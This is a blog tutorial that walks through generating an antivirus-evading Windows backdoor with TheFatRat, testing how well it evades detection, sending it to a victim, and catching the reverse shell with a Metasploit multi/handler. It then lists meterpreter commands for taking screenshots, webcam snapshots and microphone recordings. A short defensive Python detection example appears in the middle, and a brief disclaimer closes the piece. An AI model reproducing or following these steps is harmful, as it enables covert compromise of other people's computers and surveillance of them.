Thursday, November 29, 2018

Do you struggle to generate an Undetectable Payload?

Yeah. I know the feeling.

Well, when I was learning these things, I struggled every day to create an undetectable payload but I used to fail each time. At that time after some search, somehow I managed to bypass Antivirus protection.

But antivirus products were not as strong then as they are now, which is why bypassing them is not easy these days. Still, nothing can stop a hacker forever. Many developers around the world are working on clever, advanced scripts to handle these things.

In this tutorial, I am going to demonstrate TheFatRat, the best script we can use in this business.

Let's go ahead.

What is TheFatRat?

Generate Undetectable Payload for Windows Using Kali Linux

TheFatRat is an open source project available on GitHub. The script is coded by Screetsec.

The best thing about TheFatRat is that it can generate backdoors and payloads for all popular platforms such as Windows, Mac, Linux, and Android. These backdoors and payloads can be used for browser attacks, DLL attacks, etc.

This tool compiles malware with payloads, and the payloads can then be executed on the platforms mentioned above. The special advantage of this tool is that it can create powerful malware that has the ability to bypass most antivirus software protection.

You can generate backdoors, payloads for all these platforms in one tool. Isn't it a good thing?

Features of TheFatRat:

1. It can create backdoors for Windows, Mac, Linux, Android.
2. Bypass Antivirus Software Protection.
3. Multiple meterpreter listeners can be started using it.
4. Also can create autorun script.
5. The generated backdoors can be bound with MS word, PDF, RAR file etc. 

Let's go ahead and see how it can be configured in Kali Linux.

Step 1: Install FatRat in Kali Linux:

First of all, fire up your Kali Linux machine and open up the terminal. Download/clone TheFatRat from here.

Change the directory to Desktop or wherever you want. Here I am using the following commands to clone the tool.

cd Desktop/
git clone https://github.com/Screetsec/TheFatRat.git

This command will clone the tool to the Desktop. The repository is fairly large, around 200 MB, so the download will take some time to finish, depending on your internet speed. Now, change the directory to the TheFatRat folder. In my case, I am using the commands-

cd Desktop/
ls
cd TheFatRat/
ls


Now, the setup.sh script needs execute permission. Here the script is shown in green (this depends on the terminal's color scheme), which means it is already executable. If it is not, run the command chmod +x setup.sh. Note that chmod +x only makes the script executable; it does not grant root permission.

In the next step, run the script by the command-

./setup.sh

The script will start and check whether the required packages are installed. If they are not, it will install them automatically. After the check completes, a question will appear asking whether you want to create a path for FatRat or not.


If you are not sure about it, click on 'No'. If you want to create a path so that you can open the tool from anywhere, click on 'Yes'. I recommend clicking on 'Yes' so that you can open it from the terminal.

Now your setup is completed successfully.

In the next step, exit the terminal and open a new terminal and run FatRat by the command-

fatrat 

This command will start the tool. On startup, the tool will check for an internet connection and whether the required packages are properly installed. After these checks, TheFatRat will launch the options menu to create backdoors.

Let's go ahead and see how we can generate an undetectable payload using TheFatRat.

Step 2: Generate an Undetectable(100% FUD) Payload Using The FatRat:

Well, now it's time to generate a payload to execute on the victim's system. Open a new terminal and start the FatRat tool with the command 'fatrat'. After FatRat loads, you will see many options to create different backdoors for different platforms. Here I am selecting the second option, which is-

[02] Create Fud 100% Backdoor with Fudwin 1.0


This option is to generate payload for a Windows machine. After selecting the option, new options will come up. Here I am using the latest version of Fatrat. I got here a new option called Powerstager 0.2.5.

I've tried the No.1 option but it failed to create a payload and showed an error while creating the payload. Maybe the tool is still under development right now. Don't worry, try the first option after some months. For now, proceed with the No.2 option.

Old is Gold! I've selected the second option, which says Slow But powerful.

After entering the second option, the tool will show the local IPv4 and IPv6 addresses, the public IP address, and the hostname.


Here I will apply the payload on another PC of mine which is connected to my local network, so I am using the local IP here. If you want it to work over the WAN, then use your public IP address.
(N.B: If you want to use the public IP so that the payload can work over the WAN, the IP must be static. If you have a dynamic public IP, you can use the no-ip website. It will give you a hostname for free, which you can use in place of a static IP. Our tutorial on the no-ip website is coming soon! Stay tuned till then.)

Now, set the local IP and set any local port number and hit enter.

In this screen, the tool will ask you to choose your Windows architecture to generate the payload according to it. Here, my Windows is 64bit and that's why I am selecting the 64bit FUD payload.


Now the tool will start generating the payload. It might show you several errors during the generation process, but don't worry. Be patient until it finishes.


Here I've generated the payload successfully which is saved to the output folder of TheFatrat.

I've uploaded the generated payload to VirusTotal. Only 3 antivirus products out of 69 detected it as a virus, but it is not recommended to upload it to VirusTotal. Do upload and scan it on NoDistribute to make sure you have created an undetectable payload.

Now send the payload to the victim and set a listener so that you can control the system.

Let's go ahead and see how to set a listener.

Step 3: Set a listener against the payload(Meterpreter reverse TCP):

Well, we are at the end. Now it is time to do some hacking with the payload. To do that, we need to set a listener. Follow the guide. First of all, open up a new terminal and start Metasploit with the command-

msfconsole

This command will load the Metasploit interface. Now type the command-

use exploit/multi/handler

This command will start the multi handler. In the next step, set the target payload with the command-

set payload windows/meterpreter/reverse_tcp

Now it's time to set the local host and port. Run the commands-

set lhost 192.168.42.138
set lport 8080

Here, replace the local IP and the port with yours. The IP and the port are the same that we used to create the payload. You must do the same.

Now start the payload handler with the command-

exploit

This is the time to send the payload to the victim. If the victim clicks the payload, it will be connected with us and the payload handler will show the message.
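Seen from the defender's side, the behaviour described above (a user-launched executable that immediately opens an outbound TCP session to the handler's address and port) shows up in endpoint telemetry even when file scanning misses the binary. The following is an added example, not part of the original tutorial or of TheFatRat: it correlates constructed events modelled on Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) records. The field names, file paths, and the 30-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events, loosely modelled on Sysmon Event ID 1 (process
# creation) and Event ID 3 (network connection). Field names are assumptions.
EVENTS = [
    {"id": 1, "time": "2018-11-29 10:00:00", "pid": 4120,
     "image": r"C:\Users\alice\Downloads\invoice.exe", "signed": False},
    {"id": 3, "time": "2018-11-29 10:00:02", "pid": 4120,
     "dst_ip": "192.168.42.138", "dst_port": 8080},
    {"id": 1, "time": "2018-11-29 10:05:00", "pid": 5300,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "signed": True},
    {"id": 3, "time": "2018-11-29 10:05:01", "pid": 5300,
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 1, "time": "2018-11-29 10:10:00", "pid": 6001,
     "image": r"C:\Users\alice\AppData\Local\Temp\setup.exe", "signed": False},
    {"id": 3, "time": "2018-11-29 10:20:00", "pid": 6001,
     "dst_ip": "10.0.0.5", "dst_port": 4444},
]

# Directories a standard user can write to (assumed list, lower-cased).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\desktop\\", "\\temp\\")
WINDOW = timedelta(seconds=30)  # assumed correlation window


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def find_suspicious_callbacks(events, window=WINDOW):
    """Flag unsigned binaries in user-writable paths that open an outbound
    connection within `window` of being started."""
    started = {}  # pid -> process-creation event
    alerts = []
    for ev in sorted(events, key=_ts):
        if ev["id"] == 1:
            started[ev["pid"]] = ev
        elif ev["id"] == 3 and ev["pid"] in started:
            proc = started[ev["pid"]]
            risky_path = any(p in proc["image"].lower() for p in USER_WRITABLE)
            quick = _ts(ev) - _ts(proc) <= window
            if risky_path and not proc["signed"] and quick:
                alerts.append((proc["image"], ev["dst_ip"], ev["dst_port"]))
    return alerts


if __name__ == "__main__":
    for image, ip, port in find_suspicious_callbacks(EVENTS):
        print(f"ALERT {image} -> {ip}:{port}")
```

Only the first constructed process is flagged: the browser is signed and runs from Program Files, and the third process connects ten minutes after it starts, outside the window.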

Now it's time to use the meterpreter. The common commands you can use here to operate the victim's system are given below. Here I am adding an extra screenshot to show that the meterpreter commands are working.


Common meterpreter commands:

sysinfo- To Know about the system
screenshot- To get a screenshot
webcam_snap- To take a snapshot from a running webcam
record_mic- To record voice from a running mic
reboot- To reboot the system
shutdown- To shut down the system
suspend- To suspend the system

To know more commands, type '?' and hit enter. You will get all commands you can use against the victim to control his system.

Warning:

Practice only on your own property. Don't apply this to property that you do not own. If you want to, get written permission from the owner of the property first. We are not responsible for any kind of damage caused by you.

Conclusion:

It is a good thing that we can create payloads free of cost. We should thank the creator of the script. But the bad thing is, it is an open source project and anybody can misuse it. Mainly the script bunnies.

Also, we can gain some knowledge about payloads: how they work, how they can be created, and how we can protect ourselves from them.

If you found the tutorial helpful, don't forget to let us know. If you are facing any problem with the installation or use of this tool, feel free to comment below.

Authored By: Manas Lahon
